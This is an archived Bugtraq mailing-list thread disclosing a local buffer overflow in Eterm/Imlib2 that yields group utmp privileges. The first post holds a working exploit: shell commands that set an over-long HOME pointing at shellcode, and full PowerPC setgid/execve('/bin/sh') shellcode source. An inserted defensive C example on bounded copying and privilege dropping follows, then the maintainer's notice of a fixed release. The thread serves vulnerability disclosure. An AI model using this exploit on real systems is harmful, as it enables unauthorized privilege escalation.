7804773 2002-01-13 07:57 -0700  /88 lines/ Charles 'core' Stevenson <core@bokeoa.com>
Sent by: joel@lysator.liu.se
Imported: 2002-01-14  21:17  by Brevbäraren
External recipient: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
External CC recipient: vuln-dev@securityfocus.com <vuln-dev@securityfocus.com>
External reply-to: core@bokeoa.com
Recipient: Bugtraq (import) <20510>
Subject: Eterm SGID utmp Buffer Overflow (Local)
------------------------------------------------------------
From: Charles 'core' Stevenson <core@bokeoa.com>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Cc: "vuln-dev@securityfocus.com" <vuln-dev@securityfocus.com>
Message-ID: <3C41A075.84B58708@bokeoa.com>

I found this last night looking for suids to overflow.  Tested on
Debian PowerPC Unstable. Yields gid utmp from which higher privileges
could be gained with a little effort. I haven't looked too closely but
I think the overflow might be in imlib2.

[-(core@euclid:/home/core/tmp)> gcc execve.c -o execve
[-(core@euclid:/home/core/tmp)> export EGG=`./execve`
sizeof(shellcode)=73
[-(core@euclid:/home/core/tmp)> ./getenv EGG
Shellcode @ 0x7fffff95
[-(core@euclid:/home/core/tmp)> export HOME=`perl -e 'print "\x7f\xff\xff\x96"x1032'`
[-(core@euclid:/home/core/tmp)> Eterm
sh-2.05a$ id
uid=1000(core) gid=1000(core) egid=43(utmp) groups=1000(core)

ii  eterm          0.9.1-2        Enlightened Terminal Emulator
ii  libimlib2      1.0.4-1        Powerful image loading and rendering library

/* execve.c
 *
 * PowerPC Linux Shellcode
 *
 * by Charles Stevenson <core@bokeoa.com>
 *
 * original execve by my good friend
 * Kevin Finisterre  <dotslash@snosoft.com>
 */

#include <stdio.h>

char shellcode[] =
/* setgid(43) utmp */
        "\x38\x60\x01\x37"              /* 100004a0: li     r3,311             */
        "\x38\x63\xfe\xf4"              /* 100004a4: addi   r3,r3,-268         */
        "\x3b\xc0\x01\x70"              /* 100004a8: li     r30,368            */
        "\x7f\xc0\x1e\x70"              /* 100004ac: srawi  r0,r30,3           */
        "\x44\xff\xff\x02"              /* 100004b0: sc                        */
/* execve("/bin/sh") */
        "\x7c\xa5\x2a\x78"              /* 100004b0: xor    r5,r5,r5           */
        "\x40\x82\xff\xed"              /* 100004b4: bnel+  100004a0 <main>    */
        "\x7f\xe8\x02\xa6"              /* 100004b8: mflr   r31                */
        "\x3b\xff\x01\x30"              /* 100004bc: addi   r31,r31,304        */
        "\x38\x7f\xfe\xf4"              /* 100004c0: addi   r3,r31,-268        */
        "\x90\x61\xff\xf8"              /* 100004c4: stw    r3,-8(r1)          */
        "\x90\xa1\xff\xfc"              /* 100004c8: stw    r5,-4(r1)          */
        "\x38\x81\xff\xf8"              /* 100004cc: addi   r4,r1,-8           */
        "\x3b\xc0\x01\x60"              /* 100004d0: li     r30,352            */
        "\x7f\xc0\x2e\x70"              /* 100004d4: srawi  r0,r30,5           */
        "\x44\xff\xff\x02"              /* 100004d8: sc                        */
        "\x2f\x62\x69\x6e"              /* 100004dc: cmpdi  cr6,r2,26990       */
        "\x2f\x73\x68\x00";             /* 100004e0: cmpdi  cr6,r19,26624      */

int main(int argc, char **argv) {
   /* sizeof yields size_t; cast so the %d format is well-defined */
   fprintf(stderr,"sizeof(shellcode)=%d\n",(int)sizeof(shellcode));
   //__asm__("b shellcode");
   printf("%s",shellcode);
   return 0;
}

Best Regards,
Charles 'core' Stevenson
(7804773) /Charles 'core' Stevenson <core@bokeoa.com>/(Rewrapped)
Comment in text 7857757 by Michael Jennings <mej@kainx.org>
7857757 2002-01-21 14:24 -0500  /38 lines/ Michael Jennings <mej@kainx.org>
Sent by: joel@lysator.liu.se
Imported: 2002-01-21  22:36  by Brevbäraren
External recipient: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
External recipient: vuln-dev@securityfocus.com <vuln-dev@securityfocus.com>
Recipient: Bugtraq (import) <20606>
Comment on text 7804773 by Charles 'core' Stevenson <core@bokeoa.com>
Subject: Re: Eterm SGID utmp Buffer Overflow (Local)
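The post shows the effect (an over-long $HOME handed to an SGID-utmp binary ends in a shell with egid 43) but does not identify the overflowing function, so the following is an added defensive illustration rather than Eterm's or Imlib2's code. It contrasts the unchecked copy of an environment string into a fixed buffer with a bounded version that rejects input that would not fit, and adds the least-privilege step a setgid program should take before it parses anything user-controlled. The buffer size PATH_BUF, the suffix HOME_SUFFIX, every function name and the 1032-byte 'A' string (same length as the $HOME in the post) are assumptions constructed for the example.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Hypothetical sizes and names, not taken from Eterm or Imlib2. */
#define PATH_BUF    256
#define HOME_SUFFIX "/.Eterm/themes"

/* The unsafe pattern: copying an attacker-controlled environment string into
 * a fixed stack buffer with no length check. Shown for contrast only; it is
 * never called below, because a long input would corrupt the caller's stack. */
int expand_home_unchecked(const char *home, char *out)
{
    strcpy(out, home);               /* writes past 'out' if home is too long */
    strcat(out, HOME_SUFFIX);
    return 0;
}

/* The bounded form: snprintf() with an explicit truncation check. Over-long
 * input is rejected (-1) and the buffer is left empty, never partially filled. */
int expand_home_checked(const char *home, char *out, size_t outlen)
{
    if (home == NULL || outlen == 0)
        return -1;
    int n = snprintf(out, outlen, "%s%s", home, HOME_SUFFIX);
    if (n < 0 || (size_t)n >= outlen) {  /* would not fit, including the NUL */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Least privilege for an SGID program: once the group-owned resource (here,
 * utmp) has been handled, set real and effective gid to the real gid so that
 * later parsing of $HOME, image files, etc. runs with the user's own rights.
 * Run unprivileged, as in a test, this is a no-op that still returns 0. */
int drop_setgid_privilege(void)
{
    gid_t rgid = getgid();
    if (setregid(rgid, rgid) != 0)
        return -1;
    return getegid() == rgid ? 0 : -1;
}

/* Constructed input with the same length as the $HOME in the post (1032 bytes). */
static const char *constructed_long_home(void)
{
    static char big[1033];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return big;
}

/* Returns 1 when a normal path is expanded as expected. */
int checked_accepts_normal_home(void)
{
    char out[PATH_BUF];
    if (expand_home_checked("/home/core", out, sizeof out) != 0)
        return 0;
    return strcmp(out, "/home/core" HOME_SUFFIX) == 0;
}

/* Returns 1 when the 1032-byte input is refused and the buffer left empty. */
int checked_rejects_long_home(void)
{
    char out[PATH_BUF];
    out[0] = 'x';
    return expand_home_checked(constructed_long_home(), out, sizeof out) == -1
           && out[0] == '\0';
}

/* Returns 1 when the accept/reject boundary is exact: PATH_BUF-1-strlen(suffix)
 * bytes of $HOME fit, one more byte does not. */
int checked_boundary_is_exact(void)
{
    char home[PATH_BUF];
    char out[PATH_BUF];
    size_t max_home = PATH_BUF - 1 - strlen(HOME_SUFFIX);  /* 241 here */
    memset(home, 'B', max_home + 1);
    home[max_home] = '\0';
    if (expand_home_checked(home, out, sizeof out) != 0)
        return 0;
    home[max_home] = 'B';          /* now max_home + 1 bytes */
    home[max_home + 1] = '\0';
    return expand_home_checked(home, out, sizeof out) == -1;
}

int main(void)
{
    printf("normal home accepted: %d\n", checked_accepts_normal_home());
    printf("1032-byte home rejected: %d\n", checked_rejects_long_home());
    printf("boundary exact: %d\n", checked_boundary_is_exact());
    printf("setgid privilege dropped: %d\n", drop_setgid_privilege() == 0);
    return 0;
}
```

The point of the boundary check is that a "fixed" copy which merely truncates can still misbehave downstream (a silently shortened path), so the bounded version fails closed instead. The privilege drop is the part that turns a local overflow in an SGID binary into an overflow in an ordinary user process: setregid() is used rather than setgid() because, for a non-root process, setgid() changes only the effective id and leaves the saved set-group-id recoverable.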
------------------------------------------------------------
From: Michael Jennings <mej@kainx.org>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
 "vuln-dev@securityfocus.com" <vuln-dev@securityfocus.com>
Message-ID: <20020121192437.GA16555@kainx.org>

On Sunday, 13 January 2002, at 07:57:57 (-0700),
Charles 'core' Stevenson wrote:

> I found this last night looking for suids to overflow.  Tested on
> Debian PowerPC Unstable. Yields gid utmp from which higher
> privileges could be gained with a little effort. I haven't looked
> too closely but I think the overflow might be in imlib2.

Imlib2 1.0.5 has been released to fix this bug.  The source tarball
may be downloaded immediately from:

http://prdownloads.sourceforge.net/enlightenment/

The SRPM and i386 binary RPMs may also be downloaded from this
location, and I believe Debian unstable should already have the new
package as of last night's update.

My apologies to PPC users directly affected by this, but Apple has yet
to donate a PowerMac to the cause, so I can't build PPC RPMs.... :-)

Thanks to Mr. Stevenson for locating this problem and for verifying
the fix.

Regards,
Michael

-- 
Michael Jennings (a.k.a. KainX)  http://www.kainx.org/  <mej@kainx.org>
n+1, Inc., http://www.nplus1.net/         Author, Eterm (www.eterm.org)
-----------------------------------------------------------------------
 "Sorry, but my karma just ran over your dogma."            -- Unknown
(7857757) /Michael Jennings <mej@kainx.org>/--------